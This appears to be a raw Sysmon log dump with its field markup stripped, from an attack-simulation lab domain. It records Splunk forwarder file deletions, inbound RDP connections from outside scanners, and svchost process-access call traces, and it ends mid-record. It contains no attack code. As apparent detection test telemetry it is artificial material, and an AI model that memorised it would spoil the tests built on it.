23542300x800000000000000048956Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:13.695{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=432DB51AE2CFB2D2A45E0A3CA9A2BED3,SHA256=321058E660A0418EE1E8439C9B50FFC07E3C9E894295C8E49C6A75608ADEA452,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048958Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:14.898{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D45E20BFAD2665A6E775F8A5E51D28EB,SHA256=B095B9A60AC2DEA8D988ECD4E0A3A69804453D5B335BB607741A8C1164F43065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048957Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:14.695{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF85D66D997FE2BAA3D2AD7FA69653D3,SHA256=658AA6DBFB0832D856A9A6732EE18843E1B7AEF1A51DF843479D775B59FE2BF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:12.711{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-33804-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:14.427{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB452590EC222BE8BE80D320322642A4,SHA256=100F254C48421CE10B3EB7B84F823D3CA43D11D0A89ADB1F1FB8321482D3B696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048959Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:15.726{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64AD27DD4DCFF06CC1E51135599E7D3B,SHA256=03DBA6BE57DBCE3C0FD587871E44339995096B6D0F605E23C88CE434CD872DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:15.458{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EB316BF6B09A6BC3530A1CCFFDCDFDF,SHA256=7313673720017647530EBE98E0417FB55ED2044AAB69781DC8B5D9EE35DEE0A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:15.193{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C26784F254A517C8DE63C9D3ED00E4D1,SHA256=58903D83DDA7ABE8C689362AA47A0626143EB7BFF35B2B44BE251DFEE04DF4FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048961Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:16.726{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86E652D102FED7FDE5D0CDD17BEF1F3A,SHA256=0FE84D86DEE419111F377A0A8FFB924DCB07D19E981D287B26C1A62822CF4687,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:16.489{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D5866BEAFEF6104664405C3B5266818,SHA256=991D007D07CF64C442EC479B1C1C9BCA31773D148A28B4C05507138BD39863A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048960Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:12.934{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64135-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000048964Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:17.757{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEDBEC1ABAE1394B2DFDF5A8923D3EFD,SHA256=8444AD0BE887EC9C39E7AE5664DE3A988E48DC0F60C9690F4C28CDB10A3AC8F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:17.818{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3C2879E194261197BBF8721A7672D3F,SHA256=B4378488E6027E004749814453BCD22D048B5F0F1611D0E6838151BC6202B52E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:17.505{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E247524F4384806764788CD903F9F35D,SHA256=20B32FE84560F21F661D466E3DDCEF78BFA7D9A0B886E91CE1574370E45775E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048963Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:14.544{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49237-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000048962Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:17.086{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1A7B51004D053F56832950C8FE00B9E,SHA256=D65A1CD0DC3AE1628FB76D0930A097A405C8A1CD7781849FC068AB9A8AA49E27,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:15.675{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-36542-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000048966Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:18.789{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=155846EA6CAC28433F1D51925A899A87,SHA256=114D35F70AA7C08D37260CEEEB1D6FFC8D874582C09CF0CD6815004006174057,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:18.521{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC7C261D7926D4E08B535821DACB7975,SHA256=D0C43712ACDA161D0147ECA78A41EF3DBCF0C37BA255DD755F4693127C59054A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048965Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:15.680{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52456-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000062607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:16.790{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com64739-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:16.204{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57425-false10.0.1.12-8000- 23542300x800000000000000048969Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:19.851{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89C7E11D146F9F661E840AE783037755,SHA256=E354350678A4823F435F0E3595EE6C34CB57388037B9DAD56F745A64F3DCABBD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:18.633{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-39277-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:18.563{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-42013-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:19.536{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3DEEFC421EDAA113A52792DC3A171ED,SHA256=3A14133726199704956235F908DDC215F7092710B391F98E67F8B0D09A4AC096,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048968Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:16.160{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50732-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000048967Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:19.164{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=949307A18CAF7086A62C0E907213F174,SHA256=C4E84893821A2C89377B1A7707A2D3C564C77EB4BE1C16D5B364C0004AB4F9E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:19.349{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD24CE5F84E91E0A6B90F39CE3346426,SHA256=A4E3F55A9860D9C43928912FAAD1AEE80FAEC5E185990A1698ABDFD447A45D77,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:17.467{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52681-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:17.203{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-37909-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:17.107{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-40645-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000048973Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:20.867{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9125E106F141B6FD2654E076EDD13092,SHA256=EF6EDBB26C67EFCF5A76B94C59CD396425B4126F8A71E7B2C079BF94357A8802,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.739{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D67329D7626B85A90EC7715FFADCFD71,SHA256=6EE362BB559AE64C3CA414BD4099851FC44E5DEF9B993980B923AB76F7A73D55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.739{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BC6324B78E85B55A161F14FDEE9AA2B,SHA256=C06F33AB2B0541095069796EC28713D37A59B2F932EFD72713EBD477D8C33FC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048972Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:20.273{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09139C448A47F86E9956DD4057118ED1,SHA256=A09591F599CFCE6B22E4979FC61006C7753F764A2904CB455039D16355EED15D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048971Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:17.749{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52219-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000048970Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:17.511{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com51377-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000062649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 